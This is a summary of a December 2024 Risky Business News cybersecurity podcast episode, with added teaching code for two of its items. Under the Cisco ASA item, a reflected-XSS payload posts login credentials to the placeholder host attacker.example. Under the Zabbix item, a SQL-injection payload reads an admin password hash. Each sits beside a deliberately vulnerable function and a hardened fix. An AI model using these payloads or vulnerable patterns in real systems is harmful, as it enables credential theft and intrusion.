Risky Business News: Poland Arrests Former Spy Chief in Pegasus Scandal
Release Date: December 4, 2024
Host: Claire
Prepared by: Catalin Cimpanu
1. Poland Detains Former Spy Chief Over Pegasus Surveillance
Polish authorities have detained Piotr Pogonowski, the former head of Poland's internal security agency (ABW), to compel his testimony before the parliamentary inquiry into the use of Pegasus spyware. Pogonowski, who led the agency from 2016 to 2020, authorized the acquisition and deployment of NSO Group's Pegasus to monitor opposition politicians, journalists, and prosecutors investigating government corruption. This is the first time in Poland's history that a witness has been forcibly brought before a parliamentary inquiry.
Claire notes at [00:04] “Poland arrests its former spy chief in the Pegasus investigation... this marks the first time in the country's history when a witness has been forced to appear for an inquiry.”
2. Germany Forms Task Force to Combat Disinformation and Espionage
Amid rising concerns over election interference, Germany has set up a specialized task force within the Federal Office for the Protection of the Constitution (BfV) to counter disinformation and espionage campaigns ahead of the snap federal election scheduled for February next year. The agency attributes most of the surge to Russian efforts and says Russia has intensified its information warfare, including cyberattacks and real-world sabotage, to bolster pro-Russian and anti-EU candidates.
3. Europol Shuts Down the Matrix Encrypted Comms Platform
European law enforcement has dismantled Matrix, an encrypted messaging service used by criminal organizations. The operation began earlier this year: investigators seized control of the platform's infrastructure and intercepted its communications for three months before the takedown, which was accompanied by coordinated arrests across multiple jurisdictions. The investigation started when Dutch authorities found the Matrix app on the phone of a criminal involved in the murder of a Dutch journalist. This criminal platform is unrelated to the similarly named Matrix open-source communications protocol (matrix.org).
4. Crime Network: Largest German Dark Web Marketplace Taken Down
German authorities have shut down Crime Network, the largest dark web marketplace serving German-speaking users. Operating since 2012, the platform facilitated the trade of stolen data, drugs, and counterfeit documents, and had more than 100,000 users and over 100 verified sellers. Officials say Crime Network handled more than €93 million in illegal transactions over six years before its closure.
5. Russian Court Sentences Hydra Market Founder to Life Imprisonment
A Moscow court has sentenced Stanislav Moiseyev, the founder of the Hydra dark web marketplace, to life in prison. Moiseyev and 15 accomplices ran Hydra from 2015 until German authorities seized its servers in 2022; the platform was a major player in the Russian and European drug trade. His associates received sentences ranging from eight to twenty-three years. Russian officials also announced the seizure of a large quantity of narcotics during raids on Moiseyev's residence.
6. Cisco Addresses Exploitation of 2014 ASA Firewall Vulnerability
Cisco has reported that threat actors are exploiting a long-standing vulnerability in its ASA firewalls: a cross-site scripting (XSS) bug in the ASA WebVPN login page, first disclosed in 2014. Because the login page reflects attacker-controlled input without proper encoding, an attacker who tricks a user into opening a crafted link can run arbitrary JavaScript in that user's browser in the context of the VPN portal, which is enough to hijack the login form and capture the credentials the user types. According to Claire at [00:04], “Attackers can execute JavaScript by tricking a user into clicking a link, which could lead to credential theft.” Cisco says these attacks began last month, a reminder that a decade-old, patched bug remains exploitable on any appliance still running an unfixed release.
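The mechanism above, as an added example that is not Cisco's code or part of the original episode notes: a constructed stand-in for a VPN login page that reflects a request parameter into an HTML attribute, beside a hardened version that HTML-escapes every reflected value, plus a small reflection probe of the kind a pentester uses to confirm a reflected XSS. The template, the `group` parameter name and the `attacker.example` host are hypothetical.

```python
import html
import secrets

# Constructed login page, loosely modelled on a web-VPN portal: the "group"
# value comes straight from the request URL and is reflected into the form.
LOGIN_TEMPLATE = """<html><body>
<form method="post" action="/login">
<input type="hidden" name="group_list" value="{group}">
<p class="error">{error}</p>
<input name="username"><input type="password" name="password">
<input type="submit" value="Login">
</form></body></html>"""


def render_vulnerable(group: str, error: str = "") -> str:
    """Reflects request parameters verbatim: the classic reflected-XSS defect.

    A value containing '">' closes the hidden input's attribute and the tag,
    and whatever follows is parsed as new HTML by the victim's browser."""
    return LOGIN_TEMPLATE.format(group=group, error=error)


def render_hardened(group: str, error: str = "") -> str:
    """Escapes every reflected value for an HTML context, quotes included,
    so the value can neither terminate the attribute nor open a tag."""
    return LOGIN_TEMPLATE.format(
        group=html.escape(group, quote=True),
        error=html.escape(error, quote=True),
    )


# Hypothetical payload: repoint the login form at an attacker-controlled host,
# so the credentials the user types are posted there instead of the VPN.
# (attacker.example is a placeholder, not a real host.)
CREDENTIAL_THEFT_PAYLOAD = (
    '"><script>document.forms[0].action="https://attacker.example/c"</script>'
)


def probe_reflection(render) -> bool:
    """Reflected-XSS probe: inject a unique token wrapped in attribute-breaking
    characters and check whether it comes back unencoded. Returns True when the
    page is vulnerable (raw reflection), False when the output is escaped."""
    token = secrets.token_hex(6)
    canary = f'"><u>{token}</u>'
    response = render(token + canary)
    return canary in response


if __name__ == "__main__":
    print("vulnerable page reflects <script>:",
          "<script>" in render_vulnerable(CREDENTIAL_THEFT_PAYLOAD))
    print("hardened page reflects <script>:",
          "<script>" in render_hardened(CREDENTIAL_THEFT_PAYLOAD))
    print("probe vs vulnerable:", probe_reflection(render_vulnerable))
    print("probe vs hardened:", probe_reflection(render_hardened))
```

The probe deliberately uses a random token rather than a fixed string such as `<script>`, so a match cannot be a false positive from static page content, and it checks for the unencoded canary rather than for the absence of an error, which is how filters that only block a few keywords are caught.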
7. Critical SQL Injection Vulnerability Found in Zabbix Monitoring Platform
Security researchers at Qualys have uncovered a severe SQL injection vulnerability in Zabbix, the open-source monitoring platform. Rated 9.9 out of 10 in severity, the flaw lets a remote attacker holding even a low-privileged Zabbix API account inject SQL through the platform's API and take over the Zabbix server. Zabbix released patched versions last week. Qualys estimates that more than 83,000 Zabbix servers are exposed on the internet and remain at risk until updated.
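As an added example (not Zabbix's code, which is PHP, and not part of the original episode notes), the following constructed API handler shows the general class of bug behind "SQL injection through a monitoring API": a request parameter that selects column names lands in an identifier position of the query, where database drivers cannot bind it as a parameter, so even code that "uses prepared statements" for its WHERE clause is injectable. The hardened version allow-lists field names against the columns the API is permitted to expose. The `users` table, the sample rows and the `output` parameter name are hypothetical.

```python
import sqlite3

# Constructed sample schema and data, not real Zabbix tables.
# The API caller is a low-privilege user who may read a few columns of their
# own row; the password hash column must never be reachable through the API.
SCHEMA = """
CREATE TABLE users (
    userid   INTEGER PRIMARY KEY,
    username TEXT NOT NULL,
    passwd   TEXT NOT NULL,
    role     TEXT NOT NULL
);
INSERT INTO users VALUES (1, 'admin', '$2y$10$adminhash', 'superadmin');
INSERT INTO users VALUES (2, 'alice', '$2y$10$alicehash', 'user');
"""

# Columns the API is allowed to return to a caller.
EXPOSABLE_COLUMNS = frozenset({"userid", "username", "role"})


def connect() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def user_get_vulnerable(conn, caller_id: int, output: list[str]):
    """Vulnerable: the filter value is bound as a parameter (correct), but the
    requested column names are concatenated into the SELECT list (injectable).
    A caller can smuggle a subquery in as a "column" and read other rows and
    other columns, e.g. the admin's password hash."""
    cols = ", ".join(output)
    sql = f"SELECT {cols} FROM users WHERE userid = ?"
    return conn.execute(sql, (caller_id,)).fetchall()


def user_get_hardened(conn, caller_id: int, output: list[str]):
    """Hardened: identifiers cannot be parameterised, so every requested field
    is checked against an allow-list of exposable columns and then quoted as
    an identifier. Anything else is rejected before any SQL is built."""
    rejected = [c for c in output if c not in EXPOSABLE_COLUMNS]
    if rejected:
        raise ValueError(f"invalid output field(s): {rejected}")
    cols = ", ".join(f'"{c}"' for c in output)
    sql = f"SELECT {cols} FROM users WHERE userid = ?"
    return conn.execute(sql, (caller_id,)).fetchall()


# Hypothetical malicious 'output' parameter sent by the low-privilege user
# alice (userid 2): a scalar subquery disguised as a column name.
INJECTED_OUTPUT = [
    "username",
    "(SELECT passwd FROM users WHERE username = 'admin')",
]


if __name__ == "__main__":
    conn = connect()
    print("vulnerable:", user_get_vulnerable(conn, 2, INJECTED_OUTPUT))
    try:
        user_get_hardened(conn, 2, INJECTED_OUTPUT)
    except ValueError as exc:
        print("hardened rejected request:", exc)
    print("hardened, legitimate:", user_get_hardened(conn, 2, ["userid", "username"]))
```

The same pattern applies wherever user input chooses a table, column, or `ORDER BY` expression rather than a value: the defence is an allow-list (or a lookup into a fixed mapping from API field names to real columns), not escaping, because identifier quoting alone does not stop a caller from naming a column the API was never meant to expose.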
8. FTC Bans US Data Brokers Mobilewalla and Gravy Analytics/Venntel from Selling Sensitive Location Data
The US Federal Trade Commission (FTC) has taken action against data brokers Mobilewalla and Gravy Analytics, together with Gravy's subsidiary Venntel, prohibiting them from selling consumers' precise geolocation data tied to sensitive locations. The crackdown follows findings that the companies collected and sold location data without consumers' consent, including data revealing visits to military sites, churches, labor unions, and other protected locations. Claire highlights at [00:04], “The FTC cracked down on the three companies after they were caught collecting and selling data without their customers' consent.” Mobilewalla was specifically cited for using geolocation data to identify individuals visiting pregnancy centers and participants in the George Floyd protests.
9. Amazon Introduces AWS Data Transfer Terminal for Secure Data Uploads
Amazon has launched the AWS Data Transfer Terminal, a service that lets customers upload data into AWS from secure physical terminals at staffed locations. It is aimed at scenarios that call for a controlled, in-person upload or for moving data volumes that are impractical to send over a network connection. The first terminals are open in Los Angeles and New York, with more locations planned for next year.
10. Ransomware Attack Disrupts Costa Rica’s Recope Operations
Recope, Costa Rica's state oil refiner and distributor, has been hit by a ransomware attack that forced the company to fall back to manual operations; it is currently managing tanker unloading and fuel distribution without its usual software systems. Recope's management says it has brought in "American experts" to help recover the affected systems, though it is unclear whether these are from a private firm or the US government. Because Recope is Central America's leading fossil fuel importer, refiner, and distributor, the disruption poses significant operational challenges.
11. Signzy Suffers Security Breach Affecting Customer Data
KYC (Know Your Customer) service provider Signzy has confirmed a security breach after some of its customer data appeared on hacking forums. The intrusion began with an information-stealer infection on an employee's device, which is how the attacker obtained the credentials used to reach company data. Signzy is still investigating the extent and impact of the breach. According to Claire at [00:04], “According to TechCrunch, the breach occurred after one of the company's employees got infected by an info stealer.” The India-based company serves more than 600 financial institutions worldwide.
12. Japanese Crypto Exchange DMM Bitcoin Ceases Operations Following $305 Million Hack
DMM Bitcoin, a prominent Japanese cryptocurrency exchange, is shutting down following the theft of approximately $305 million worth of bitcoin from its wallets in late May, the eighth largest crypto heist on record. DMM is transferring its customer accounts and assets to another exchange owned by a holding corporation, and had previously promised customers full reimbursement of the stolen funds.
13. XT Cryptocurrency Exchange Halts Transactions After $1.7 Million Theft
The XT cryptocurrency exchange has suspended all transactions while it investigates a security breach in which threat actors are believed to have stolen around $1.7 million worth of tokens; the intrusion vector has not yet been identified. The platform says it holds sufficient reserves to reimburse affected users.
14. Clipper DEX Suffers $500,000 Crypto Token Theft via API Exploit
A threat actor has exploited a vulnerability in the API of the Clipper decentralized exchange (DEX), stealing nearly $500,000 worth of crypto tokens, roughly 6% of the exchange's total value locked (TVL). Clipper has paused all operations while it investigates the attack.
15. Apple Faces Lawsuit Over Alleged Employee Monitoring Practices
Amar Bhakta, an Apple employee in the company's advertising division, has filed a lawsuit alleging that Apple monitors employees' personal devices and iCloud accounts without authorization. The lawsuit claims that Apple requires employees who use personal devices for work to install software that tracks all of their activity, including while they are off duty and after they have left the company.
16. Riot Games Offers $100,000 Rewards for Cracking Vanguard Anti-Cheat System
Riot Games has announced a $100,000 bounty for security researchers who can bypass Vanguard, the company's anti-cheat system. A similar reward is offered for exploits that could disrupt individual players or knock them offline through denial-of-service attacks. The update to Riot's bug bounty program follows exploits earlier this year that targeted games from Activision and EA.
This comprehensive summary of the December 4th, 2024 episode of Risky Business News provides an in-depth overview of the latest cybersecurity developments, ensuring that even those who haven't listened to the podcast remain well-informed on critical issues affecting the digital landscape.
